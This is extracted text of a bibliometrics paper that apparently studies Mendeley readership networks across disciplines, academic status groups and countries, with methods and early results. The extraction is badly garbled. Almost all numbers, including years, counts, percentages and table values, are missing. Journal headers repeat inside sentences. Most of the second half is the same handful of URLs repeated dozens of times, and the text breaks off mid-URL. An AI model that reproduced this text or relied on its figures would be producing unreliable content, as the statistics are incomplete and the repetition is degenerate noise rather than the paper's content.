for studying these patterns is bibliometric networking or science mapping. here, bibliometric data are used to generate networks of citation relations (e.g., between scholarly journals), networks of co-authorships (e.g., between highly-cited researchers in information science), or networks of co-occurrence relations between keywords, words in abstracts and/or words in titles (e.g., co-occurrence relations between words in abstracts of papers published in information science) (van eck & how to cite this article haunschild et al. ( ), networks of reader and country status: an analysis of mendeley reader statistics. peerj comput. sci. :e ; doi . /peerj-cs. mailto:r.haunschild@fkf.mpg.de https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. waltman, ). powerful computers have led to the analysis of large networks, which may include the whole web of science (wos) database from thomson reuters (milojević, ). today, these networks are not only of interest for specialists in bibliometrics or networking, but also for stakeholders from publishers, research institutions, and funding agencies. according to martin, nightingale & rafols ( ) “network and science-mapping visualizations have considerably enhanced the capacity to convey complex information to users. these tools are now sufficiently mature to be used not only available in academia but also in consultancy and funding organisations” (p. ). overviews of publications dealing with networking and mapping have been published, for example, by börner, sanyal & vespignani ( ), leydesdorff ( ), and mingers & leydesdorff ( ). in recent years, altmetrics has developed to a popular research field in bibliometrics (bornmann, ). altmetrics counts and analyzes views, downloads, clicks, notes, saves, tweets, shares, likes, recommends, tags, posts, trackbacks, discussions, bookmarks, and comments to scholarly papers. altmetrics data reflect different kinds of research impact which has been demonstrated, for example, in the case of mendeley readership data for social sciences and humanities (mohammadi & thelwall, ; mohammadi & thelwall, ; sud & thelwall, in press). mendeley readership data are essentially bookmarking data. for the sake of simplicity, we refer to the mendeley data only as reader counts. because it is not clear, what altmetrics counts really measure, most of the studies in this field have calculated the correlation between altmetric counts and citation counts (bornmann, ). a substantial positive correlation points to a certain, but otherwise undefined, meaning of altmetrics in a scientific context. similar to bibliometric data, altmetric data can not only be used for research evaluation purposes, but also for network analysis and science mapping. kraker et al. ( ) presented a methodology and prototype for creating knowledge domain visualizations based on readership statistics (from mendeley). haunschild & bornmann ( ) generated a readership network which is based on mendeley readers per (sub-)discipline for a large dataset of biomedical papers. in this study, we investigate mendeley readership data for all articles and reviews in wos where a doi (digital object identifier) was available from with the following research questions: ( ) are there differences and similarities between disciplines in bookmarking papers? ( ) how do researchers in different career stages differ in terms of bookmarking papers? which groups of researchers read similar or different papers? ( ) researchers from which countries read papers? are there patterns of similar readership between specific countries? we address these questions by studying the network nature of the mendeley readership data. for this purpose, we generate three different networks: ( ) the network of disciplinary affiliations can show similarities of and differences in the readerships of papers. ( ) the status group network shows which status groups (e.g., students, lecturers, or professors) commonly read papers (or not). ( ) the country network focuses on global readership patterns: similar and different readings of papers are visualized at the country level. haunschild et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. methods dataset used during december – , , mendeley readership statistics for na = , , articles and nr = , reviews were requested via the application programming interface (api), which was made available in , using http get requests from r (http://www. r-project.org/). an example of the r script is available at http://dx.doi.org/ . /m . figshare. . all papers studied here were published in . the publication year is a compromise of taking a rather recent publication year because mendeley was founded in and allowing enough time after publication for reader counts to aggregate. however, as mendeley reader counts are known to accumulate much faster than citation counts (maflahi & thelwall, in press), we feel justified using the publication year . the dois of the papers in the samples were obtained from the in-house database of the max planck society (mpg) based on the wos and administered by the max planck digital library (mpdl). the doi was used to identify the papers in the mendeley api. the mendeley reader counts of , , articles ( . %) and , reviews ( . %) were retrieved via the mendeley api. these percentages are higher than those reported in other studies (haustein & larivière, b). the papers which were matched via their doi in the mendeley api (n = , , ) are analyzed in the remainder of this study. in total, we recorded , , reader counts for articles and , , reader counts for reviews. it is optional for the users of mendeley to provide their disciplinary affiliations (selecting from predefined sub-disciplines) and location. however, mendeley does not provide the possible values of country names in the api. therefore, we used the iso (international the country names in the mendeley web frontend are standardized. the user provides the city name and mendeley proposes different city–country combinations from which the user can choose. organization for standardization) names (see http://countrycode.org) as possible values. out of the countries we could not find any contributions from countries. however, we are not able to distinguish between a country value which is not possible and a paper with no readers from this country. for example, one is less surprised to find no reader counts for countries like holy see (vatican city) than for singapore. we retrieved , , reader counts ( . %) for articles and , reader counts ( . %) for reviews where the users shared their location information. country-specific readership information was available for , ( . %) articles and , ( . %) reviews. the academic status seems to be a mandatory piece of information, as the total number of mendeley readers found agrees with the status-specific readership information. the self-assigned sub-discipline is not mandatory but most mendeley users provide it in our sample set. only , ( . %) of the mendeley article readers and ( . %) review readers did not share their (sub-) disciplinary affiliation. software and statistics the data was organized at three levels of aggregation: (a) groups of individual readers who bookmark the papers, in terms of disciplinary affiliations; (b) groups of readers in terms of their professional status (professor, phd student, postdoc, etc.); haunschild et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://www.r-project.org/ http://www.r-project.org/ http://www.r-project.org/ http://www.r-project.org/ http://www.r-project.org/ http://www.r-project.org/ http://www.r-project.org/ http://www.r-project.org/ http://www.r-project.org/ http://www.r-project.org/ http://www.r-project.org/ http://www.r-project.org/ http://www.r-project.org/ http://www.r-project.org/ http://www.r-project.org/ http://www.r-project.org/ http://www.r-project.org/ http://www.r-project.org/ http://www.r-project.org/ http://www.r-project.org/ http://www.r-project.org/ http://www.r-project.org/ http://www.r-project.org/ http://www.r-project.org/ http://www.r-project.org/ http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://countrycode.org http://countrycode.org http://countrycode.org http://countrycode.org http://countrycode.org http://countrycode.org http://countrycode.org http://countrycode.org http://countrycode.org http://countrycode.org http://countrycode.org http://countrycode.org http://countrycode.org http://countrycode.org http://countrycode.org http://countrycode.org http://countrycode.org http://countrycode.org http://countrycode.org http://countrycode.org http://countrycode.org http://countrycode.org http://dx.doi.org/ . /peerj-cs. table statistics of the full networks of disciplinary affiliations, countries, and status groups. statistical parameter disciplinary affiliation country status group number of vertices average degree . . . degree centralization . . . density . . . closure . . . average distance . . . standard deviation of average distance . . . diameter compactness . . . modularity . . . (c) groups of readers in terms of their countries as provided by mendeley readers in their profile. the mendeley bookmarking can be considered as referencing, and then the analysis of this mendeley data is analogous to bibliographic coupling in bibliometrics (kessler, ). although being analogous to bibliographic coupling, the bookmark coupling provides different kinds of information in comparison to bibliographic coupling: first, bibliographic coupling is based on the references in the paper, while mendeley reader counts are similar to times cited data and thus reflect the citing-side (reader-side) perspective. second, bibliographic coupling captures only authors of papers which are indexed in a citation index. there is no necessary relationship between authoring and reading papers: some people read more literature and author few papers or write more monographs. bookmark couplings also capture users of mendeley who author fewer papers or publish in journals which are not indexed in popular citation indices. however, bookmark coupling has another bias, as not everyone uses mendeley to bookmark papers. both methods (bibliographic and bookmark coupling) are interesting to analyze networks of publications. they complement each other. in each of the three analyses, the largest component is extracted, and further analyzed using the community finding algorithm of blondel et al. ( ). pajek is used for the network analysis. default values were used during construction and analysis of all networks. all reader counts are weighted equally (pajek option “unweighted”), and each network connection is counted as a single co-bookmarking event. the results are visualized using vosviewer. results statistical parameters the three networks (disciplinary affiliations, professional status, and countries) presented below are compared in terms of network statistics in table . the network among the status groups is fully connected; but we will discuss the relative weights of the relations haunschild et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. in the following. the other two networks are very different in nature, despite the seeming similarity in some of these parameters. disciplinary affiliations among the disciplinary affiliations, could be distinguished in this data, of which ( . %) form a largest component. the five affiliations which were not connected are: “judaism”, “catholicism”, “transport law”, “entertainment, sports and gaming law”, and “air and space law”. these five affiliations belong to the humanities (theology and law, respectively). we found a total of three reader counts for “judaism” and one reader count each for the other four disconnected disciplinary affiliations. only very few researchers in these disciplines seem to use mendeley. similar results have been reported by jeng, he & jiang ( ) who reported that they “did not see many group users from the humanities and other related fields” (p. ). the affiliations in the main component can be sorted into four groupings by the community-finding algorithm of blondel et al. ( ); the modularity—a measure for the quality of the clustering between zero and one—is q = . (cf. table ). the four groups are, respectively: . affiliations mainly in the social sciences and the humanities (fig. ); . affiliations in the bio-medical sciences (fig. ); . affiliations in the natural sciences and engineering (also included in fig. ); . affiliations in biology and the geo-sciences (not shown separately). zahedi & van eck ( ) have found similar results. they reported that mendeley users are most active in the biomedical sciences, life sciences, and social sciences. figure shows sub-discipline affiliations of mendeley readers (group ) with their connections in the social sciences and humanities. the network shown in fig. also includes some reading in the computer sciences and mathematics. the relation seems to be via cognitive psychology, artificial intelligence, etc. the humanities are positioned more at the periphery of this set. the sub-disciplines “taxation law” and “german language” are not directly connected to this sub-group, but nevertheless sorted into it by the community-finding algorithm. the number of readers providing bookmarks to these sub-disciplines is low. figure shows sub-discipline affiliations in the bio-medical sciences (group ) and sub-discipline affiliations in the natural sciences and engineering (group ). we do not show the links in order to keep the distinction between the two sets of nodes (with different colors) focal to the visualization. a version with the network links visible can be web-started from http://www.vosviewer.com/vosviewer.php?map=http://www. leydesdorff.net/mendeley/fig map.txt&network=http://www.leydesdorff.net/mendeley/ fig net.txt&n lines= it is somewhat surprising to see the sub-disciplines “regional law” and “latin” sorted into the network of mainly bio-medical sciences in fig. . as the links in the web-started version show, these bookmarks have many links to several sub-disciplines within the bio-medical network. haunschild et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig 